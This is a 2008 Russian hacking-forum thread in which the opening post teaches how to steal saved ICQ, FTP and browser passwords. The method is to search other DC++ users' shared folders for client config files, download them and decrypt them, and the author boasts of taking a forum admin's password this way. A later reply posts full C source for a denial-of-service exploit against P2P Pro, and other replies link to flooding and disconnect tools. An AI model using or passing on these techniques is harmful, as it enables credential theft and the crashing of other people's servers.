26.05.2008, 19:32
|
|
Banned
Регистрация: 15.01.2008
Сообщений: 63
С нами:
9642354
Репутация:
46
|
|
Инструмент: Dc++
Мини мануал о том, что можно вытворять на хабе.
Все, ниже изложенное было придумано и написано мной, мб эта тема уже поднималась.
1. Угон icq.
Всем известно, что пассы от кипа содержаться в файле config.ini. Очень много юзверей, расшаривающих свои program files в которых зачастую находится дира qip. Далее все просто, идем поиск, вписываем config.ini, ищем. Перед тем как сливать все найденные конфиги, обязательно смотрите путь до этого файла, дабы не слить шлак. (Примерный путь до конфига: QIP/user/nomerICQ/config.ini)
После того, как мы слили конфиг расшифровываем его прогой МПР . (Жмем «мастер», выбираем нужный модуль, ставим путь до скачанного конфига, смотрим пасс=)
Аналогичным образом можно тырить пассы от R&Q, файл конфига - andrq.ini
В случае с клиентами Mirana, Icq 5, Odigo, Pidgin нужно тянуть всю папку.
2. Угон фтп.
Все аналогично. Клиенты/файлы с конфигами.
BulletProof FTP Client - bpftp.dat
FileZilla - FileZilla.xml
FTP Commander - ftplist.txt
Total Commander - wcx_ftp.ini
Ищем конфиги, сливаем, расшифровываем.
3. Сохраненные в браузерах данные. (Protected Storage).
Opera - wand.dat
Mozilla Firefox - *.s *.txt (лучше тянуть всю папку)
Internet Explorer – неебу (также тянем всю папку)
Далее аналогично, сливаем, расшифровываем той же МПР.
Есть задумка, тырить серты от Вм для входа в кипер лайт.. Но пока я не пробовал реализовать эту идею.
4. Не палим содержимое винта.
Часто бывает так, что для нормальной загрузки файлов с дц++ нужно расшарить нное кол-во гб, режим "за стеклом" лишь запрещает закачку другим юзерам ваших расшаренных файлов, но не просмотр названий и путей содержимого. А нам палить содержимое винта не нужно. Можно открыть любой файл хекс редактором и напихать в ручную в конец всякого говна.. Но 10гб говна это жестоко=) Для этого можно заюзать прогу Rubbish 1.0 , она добавялет указанное количество мусора в конец файла.
Примечание.
Всегда внимательно смотрите ники юзеров у кого сливаете конфиги, ибо нередко слабоумные админы/модеры известных или "нужных" проектов расшаривают свою конфиденциальную инфу. (у меня получалось слить конфиг от оперы одмина нашего локального форума, где у него лежал пасс от админки. Хотя до этого, его форум йа пытался похекать несколько дней)
После прочтения статьи внимательно просмотрите ваши расшаренные файлы).
Удачи всем!
(c) WedRRRySS
Интересное по теме:
Флудер ДЦ++ http://forum.antichat.ru/thread36241.html
Выбивание юзверей из сети http://forum.xakep.ru/m_770333/tm.htm
Последний раз редактировалось WeddRRRyss; 26.05.2008 в 19:56..
|
|
|
26.05.2008, 19:56
|
|
Новичок
Регистрация: 24.04.2008
Сообщений: 22
С нами:
9498164
Репутация:
16
|
|
Internet Explorer – неебу (также тянем всю папку)
Нах, IE хранит пароли в Protected Storage
А так идея баян и статью эту уже кто-то писал
|
|
|
|
26.05.2008, 20:00
|
|
Banned
Регистрация: 15.01.2008
Сообщений: 63
С нами:
9642354
Репутация:
46
|
|
Сообщение от SMAC
Нах, IE хранит пароли в Protected Storage
А так идея баян и статью эту уже кто-то писал
Йа лично дошел до способа сам..
|
|
|
|
26.05.2008, 20:03
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 904
С нами:
9655526
Репутация:
1821
|
|
И это статья???????!!!
М-Да удивил!
|
|
|
|
26.05.2008, 20:05
|
|
Постоянный
Регистрация: 25.05.2008
Сообщений: 367
С нами:
9454639
Репутация:
416
|
|
в сети народу мало, подскажите какой-нибудь крупный инет хаб
|
|
|
|
26.05.2008, 20:07
|
|
Новичок
Регистрация: 24.04.2008
Сообщений: 22
С нами:
9498164
Репутация:
16
|
|
Сообщение от k0lbasa
в сети народу мало, подскажите какой-нибудь крупный инет хаб
->http://dchublist.ru/
|
|
|
|
26.05.2008, 20:05
|
|
Banned
Регистрация: 24.05.2008
Сообщений: 42
С нами:
9455426
Репутация:
26
|
|
имхо, во многих случаях придется тянуть реестр(!)...xD
|
|
|
|
26.05.2008, 20:17
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
С нами:
10467746
Репутация:
4738
|
|
TC, я слыхал есть эксплоиты под Dc++, вот если бы ты сделал их обзор, то у статьи есть шанс выжить...
|
|
|
|
26.05.2008, 20:24
|
|
Banned
Регистрация: 15.01.2008
Сообщений: 63
С нами:
9642354
Репутация:
46
|
|
Сообщение от -=lebed=-
TC, я слыхал есть эксплоиты под Dc++, вот если бы ты сделал их обзор, то у статьи есть шанс выжить...
Попробую поискать..
|
|
|
|
26.05.2008, 20:24
|
|
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
С нами:
10019906
Репутация:
3702
|
|
Exploit EVILGMP, отрубает серв))
PHP код:
/*
P2P Pro Command DOS Exploit
------------------------------------
Infam0us Gr0up - Securiti Research
Info: infamous.2hell.com
Vendor URL: http://www.digital-revolution.org/P2PPro.html
*/
#include <string.h>
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char doscore[] =
"\x3f\x3f\xbc\x59\x70 "
"\x32\x70\x3f\xe1 "
"\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x46\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x4f\x57\x4e\x45\x44\x2e\x74"
"\x78\x74\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x31\x32\x33\x32\x34\x32\x2e\x6b\x62";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;
if (argc < 2)
{
printf(" P2P Pro Command DOS Exploit \n", argv[0]);
printf(" --------------------------------------\n", argv[0]);
printf(" Infam0us Gr0up - Securiti Research\n\n", argv[0]);
printf("[-]Usage: %s [target] [port]\n", argv[0]);
printf("[?]Exam: %s localhost 7802\n", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
port = 7802;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);
inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR \n");
exit(1);
}
printf(" P2P Pro Command DOS Exploit \n", argv[0]);
printf(" --------------------------------------\r\n\n", argv[0]);
printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED \n", argv[0]);
exit(1);
}
printf("[OK]\n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILED\n");
exit(1);
}
printf("[OK]\n");
printf("Target listen.. \n");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERROR\n");
closesocket(inetdos);
exit(1);
}
printf("[OK]\n ");
printf("[+] Server SHUTDOWNED!\n");
closesocket(inetdos);
WSACleanup();
return 0;
}
Последний раз редактировалось Solide Snake; 27.05.2008 в 17:31..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
